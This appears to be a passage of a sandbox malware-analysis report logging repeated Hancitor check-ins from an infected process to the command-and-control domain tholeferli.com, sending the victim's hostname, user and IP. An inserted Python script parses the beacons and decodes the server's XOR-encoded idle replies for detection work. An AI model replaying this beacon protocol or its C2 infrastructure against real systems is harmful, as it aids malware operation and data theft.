                                                Data Raw: 63 0d 0a 47 43 58 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGCXTARRABw==0


                                                Session ID: 157 | Source IP: 192.168.2.22 | Source Port: 49324 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:24.359683037 CEST | 471 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:24.515281916 CEST | 472 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:24 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 51 4a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZQJAARRABw==0


                                                Session ID: 158 | Source IP: 192.168.2.22 | Source Port: 49325 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:24.782763958 CEST | 472 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:24.938327074 CEST | 473 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:24 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGZATARRABw==0


                                                Session ID: 159 | Source IP: 192.168.2.22 | Source Port: 49326 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:25.219157934 CEST | 473 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:25.374665976 CEST | 474 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:25 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 51 4a 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cNQJMARRABw==0


                                                Session ID: 16 | Source IP: 192.168.2.22 | Source Port: 49183 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:10.107105017 CEST | 313 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:10.265167952 CEST | 313 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:10 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 48 53 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQHSJARRABw==0


                                                Session ID: 160 | Source IP: 192.168.2.22 | Source Port: 49327 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:25.640275955 CEST | 475 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:25.797365904 CEST | 475 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:25 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 42 46 55 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cBFUYARRABw==0


                                                Session ID: 161 | Source IP: 192.168.2.22 | Source Port: 49328 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:26.086143970 CEST | 476 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:26.256982088 CEST | 476 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:26 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 43 54 47 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cCTGXARRABw==0


                                                Session ID: 162 | Source IP: 192.168.2.22 | Source Port: 49329 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:26.538968086 CEST | 477 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:26.707770109 CEST | 477 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:26 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4b 42 59 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cKBYPARRABw==0


                                                Session ID: 163 | Source IP: 192.168.2.22 | Source Port: 49330 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:26.988025904 CEST | 478 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:27.143672943 CEST | 478 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:27 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 4e 4d 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: c\r\nTNMGARRABw==\r\n0\r\n\r\n
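Every session in this part of the report is the same exchange: the rundll32.exe process that Hancitor was injected into POSTs a check-in to tholeferli.com/8/forum.php (a GUID, the build tag 2207_xwpi67, INFO holding hostname\user, the external IP, TYPE and the Windows version, 110 bytes in total), and the server answers with a single HTTP chunk of 12 base64 characters, so the "Data Ascii" rendering runs the chunk size "c", the token and the terminating "0" chunk together. The Python below is an added example, not part of the Joe Sandbox report and not the malware's own code. It parses the check-in body, strips the chunked framing and decodes the reply. The single-byte XOR key 0x7A is an assumption taken from public Hancitor analyses; it is checked here against the captured replies, which all decode to the idle command "{n:}" after three varying filler bytes. The sample body and response bytes are copied from the session records above.

```python
import base64
import re
from urllib.parse import parse_qs

# Constructed sample input: the check-in body and the raw chunked reply exactly
# as captured in session 163 above (Data Raw of the POST and of the 200 OK).
SAMPLE_CHECKIN_BODY = (
    "GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\\user"
    "&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)"
)
SAMPLE_RESPONSE_RAW = b"c\r\nKBYPARRABw==\r\n0\r\n\r\n"

# Assumption (from public Hancitor write-ups, not from this report): the C2 reply
# is base64, then every byte is XORed with 0x7A. Verified against the captured
# replies, which all end in the idle command "{n:}".
HANCITOR_XOR_KEY = 0x7A

# Keys the check-in always carries; used as a simple detection heuristic.
CHECKIN_FIELDS = ("GUID", "BUILD", "INFO", "EXT", "IP", "TYPE", "WIN")

# Commands are brace-delimited "opcode:argument" tokens; bytes before the first
# brace are filler and vary from reply to reply.
COMMAND_RE = re.compile(r"\{([a-z]):([^}]*)\}")


def parse_checkin(body: str) -> dict:
    """Split the form-urlencoded check-in into a field -> value dict."""
    fields = parse_qs(body, keep_blank_values=True)  # EXT= is empty
    return {k: v[0] for k, v in fields.items()}


def is_hancitor_checkin(body: str) -> bool:
    """True when all seven check-in keys are present and TYPE is numeric."""
    fields = parse_checkin(body)
    return all(k in fields for k in CHECKIN_FIELDS) and fields["TYPE"].isdigit()


def dechunk(raw: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body: hex size line, data, ..., 0 chunk."""
    out = bytearray()
    pos = 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";")[0], 16)  # ignore chunk extensions
        if size == 0:
            return bytes(out)
        start = eol + 2
        out += raw[start:start + size]
        pos = start + size + 2  # skip the CRLF that closes this chunk


def decode_response(raw: bytes) -> str:
    """Dechunk, base64-decode and XOR-decode a C2 reply into printable text."""
    token = dechunk(raw).strip()
    plain = bytes(b ^ HANCITOR_XOR_KEY for b in base64.b64decode(token))
    return plain.decode("latin-1")  # filler bytes need not be valid UTF-8


def extract_commands(decoded: str) -> list:
    """Return (opcode, argument) pairs found in a decoded reply."""
    return COMMAND_RE.findall(decoded)


if __name__ == "__main__":
    info = parse_checkin(SAMPLE_CHECKIN_BODY)
    print("check-in:", is_hancitor_checkin(SAMPLE_CHECKIN_BODY), info["BUILD"], info["INFO"])
    decoded = decode_response(SAMPLE_RESPONSE_RAW)
    print("decoded reply:", repr(decoded), "commands:", extract_commands(decoded))
```

Running the decoder over the other replies in this report (TNMGARRABw==, KVEPARRABw==, and so on) gives the same "{n:}" tail with different filler, which is why the beacon repeats every few hundred milliseconds without downloading anything further in this part of the capture.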


                                                Session ID: 164 | Source IP: 192.168.2.22 | Source Port: 49331 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:27.421057940 CEST | 479 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:27.577605009 CEST | 479 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:27 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4b 56 45 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: c\r\nKVEPARRABw==\r\n0\r\n\r\n


                                                Session ID: 165 | Source IP: 192.168.2.22 | Source Port: 49332 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:27.869748116 CEST | 480 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:28.038038969 CEST | 481 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:27 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: c\r\nTHSGARRABw==\r\n0\r\n\r\n


                                                Session ID: 166 | Source IP: 192.168.2.22 | Source Port: 49333 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:28.308907032 CEST | 481 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:28.478202105 CEST | 482 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:28 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 41 51 4a 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: c\r\nAQJZARRABw==\r\n0\r\n\r\n


                                                Session ID: 167 | Source IP: 192.168.2.22 | Source Port: 49334 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:28.748070955 CEST | 482 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:28.917356014 CEST | 483 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:28 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 4d 4e 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: c\r\nGMNTARRABw==\r\n0\r\n\r\n


                                                Session ID: 168 | Source IP: 192.168.2.22 | Source Port: 49335 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:29.208460093 CEST | 484 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:29.373975039 CEST | 484 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:29 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 56 45 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: c\r\nGVETARRABw==\r\n0\r\n\r\n


                                                Session ID: 169 | Source IP: 192.168.2.22 | Source Port: 49336 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:29.651611090 CEST | 485 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:29.808022022 CEST | 485 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:29 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 46 55 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: c\r\nQFUJARRABw==\r\n0\r\n\r\n


                                                Session ID: 17 | Source IP: 192.168.2.22 | Source Port: 49184 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:10.542979002 CEST | 314 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:10.699769020 CEST | 314 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:10 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
